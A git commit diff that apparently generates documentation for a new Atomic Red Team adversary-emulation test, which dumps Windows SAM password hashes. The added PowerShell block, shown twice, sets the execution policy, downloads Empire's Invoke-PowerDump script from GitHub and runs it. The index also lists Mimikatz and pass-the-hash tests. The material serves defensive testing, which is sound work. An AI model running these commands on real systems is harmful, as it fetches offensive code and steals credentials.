Generate docs from job=validate_atomics_generate_docs branch=master

2020-08-16 02:31:44 +00:00
parent f4d059dbbc
commit 19b5ee9ee4
8 changed files with 50 additions and 0 deletions
@@ -205,6 +205,7 @@ credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864b
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
+credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
 defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
 defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
 defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
@@ -443,6 +443,7 @@ credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
+credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
 lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
 lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
 lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
@@ -432,6 +432,7 @@
  - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
  - Atomic Test #2: Registry parse with pypykatz [windows]
  - Atomic Test #3: esentutl.exe SAM copy [windows]
+  - Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -906,6 +906,7 @@
  - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
  - Atomic Test #2: Registry parse with pypykatz [windows]
  - Atomic Test #3: esentutl.exe SAM copy [windows]
+  - Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
 - T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -20326,6 +20326,20 @@ credential-access:
 '
        name: command_prompt
        elevation_required: true
+    - name: PowerDump Registry dump of SAM for hashes and usernames
+      auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193
+      description: Executes a hashdump by reading the hasshes from the registry.
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
+          Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
+          Invoke-Webrequest -Uri "https://github.com/BC-SECURITY/Empire/blob/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
+          Import-Module .\PowerDump.ps1
+          Invoke-PowerDump
+        name: powershell
+        elevation_required: true
  T1555.002:
    technique:
      external_references:
@@ -30,6 +30,8 @@ Notes:

 - [Atomic Test #3 - esentutl.exe SAM copy](#atomic-test-3---esentutlexe-sam-copy)

+- [Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames](#atomic-test-4---powerdump-registry-dump-of-sam-for-hashes-and-usernames)
+

 <br/>

@@ -151,4 +153,32 @@ del #{copy_dest}\#{file_name} & esentutl.exe /y /vss #{file_path} /d #{copy_dest



+<br/>
+<br/>
+
+## Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames
+Executes a hashdump by reading the hasshes from the registry.
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
+Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
+Invoke-Webrequest -Uri "https://github.com/BC-SECURITY/Empire/blob/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
+Import-Module .\PowerDump.ps1
+Invoke-PowerDump
+```
+
+
+
+
+
+
 <br/>
@@ -80,6 +80,7 @@ atomic_tests:
    elevation_required: true
    
 - name: PowerDump Registry dump of SAM for hashes and usernames
+  auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193
  description: Executes a hashdump by reading the hasshes from the registry.
  supported_platforms:
  - windows
@@ -564,3 +564,4 @@ b5656f67-d67f-4de8-8e62-b5581630f528
 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
 1620de42-160a-4fe5-bbaf-d3fef0181ce9
 db020456-125b-4c8b-a4a7-487df8afb5a2
+804f28fc-68fc-40da-b5a2-e9d0bce5c193